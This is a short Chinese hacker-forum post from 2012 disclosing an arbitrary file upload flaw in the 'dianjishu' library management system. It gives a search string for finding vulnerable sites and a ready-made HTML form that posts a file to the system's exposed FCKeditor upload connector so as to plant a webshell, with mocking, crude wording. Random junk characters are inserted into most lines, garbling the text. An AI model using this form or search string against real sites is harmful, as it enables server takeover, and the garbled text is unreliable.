主题:图书馆系统任意文件上传漏洞9 ?2 X1 ^1 g5 h# c+ U* M P4 @
作者:冰锋刺客$ V; K8 M* C/ y& y
厂商:点击书(dianjishu.com)3 r' B! T/ n( K$ M$ ~4 ?4 n
日期:2012-6-213 B& K, k9 m0 u( W; y
* a; S6 V) x k6 }& v" k. @: H3 y
I 概述
F- ~) v/ X3 W- a3 p6 i 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell3 ~0 t: A( W! W* i5 u( I
II 简介
3 s. J; @% z, ` 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"/ S Y8 ?* t1 V" f& h1 N# A/ G8 n
补充一个漏洞0 M$ b! r6 ]' }6 e c( [3 c
<form id="frmUpload" enctype="multipart/form-data"
8 \4 \- b* n) s' ^, A/ {3 W4 V action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
; H) L' Y8 f) q$ t" s# v1 j <input id="btnUpload" type="submit" value="操翻他">
7 t! z( k% c: x R' \' W# m </form>
+ a5 i- s7 @- N. n2 }$ L 你们懂的! L- x; U5 _" M- u: J( v
那傻逼提供还需要改包.( a1 g/ X0 n( Z# e" ]( d
自己看了下源代码发现fckeditor
- ?; ]" m \$ T8 Y# K0 z 直接秒杀& H2 ], p; m8 ~# t6 S! d
|